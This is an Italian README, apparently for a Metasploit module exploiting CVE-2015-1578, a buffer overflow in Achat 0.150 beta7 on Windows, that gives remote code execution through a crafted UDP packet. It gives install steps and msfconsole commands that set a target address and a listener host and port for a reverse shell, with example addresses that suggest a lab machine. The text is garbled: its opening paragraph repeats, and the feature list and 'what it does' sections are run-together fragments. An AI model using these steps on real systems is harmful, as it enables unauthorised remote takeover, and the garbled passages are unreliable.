Questo è un exploit proof-of-concept del modulo Metasploit per CVE-2015-1578, una vulnerabilità di buffer overflow in Achat 0.150 beta7 su Windows. Lo sfruttamento porta all'esecuzione remota di codice tramite un pacchetto UDP appositamente creato.
Questo è un modulo Metasploit per CVE-2015-1578, una vulnerabilità di buffer overflow in Achat 0.150 beta7 su Windows. Lo sfruttamento porta all'esecuzione remota di codice tramite un pacchetto UDP appositamente predisposto.
Questo modulo è progettato per fungere da esempio pulito, minimale e ben strutturato dello sviluppo di exploit per Metasploit. Dimostra:
msfvenommsfvenom nel tuo $PATHmsfvenom per generare un payload con codifica x86/unicode_mixed e caratteri dannosi personalizzati./install.sh
Quindi avvia Metasploit ed esegui:
reload_all
use exploit/windows/yaldobaoth/achat_bof
Opzioni
RHOSTS – Indirizzo IP del target (obbligatorio)LHOST – Indirizzo IP locale per la shell inversa (obbligatorio)LPORT – Porta locale per la shell inversa (predefinita: 4444)RPORT – Porta UDP remota sul target (predefinita: 9256)Esempio di utilizzo
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
Questo farà:
LHOST:LPORT specificato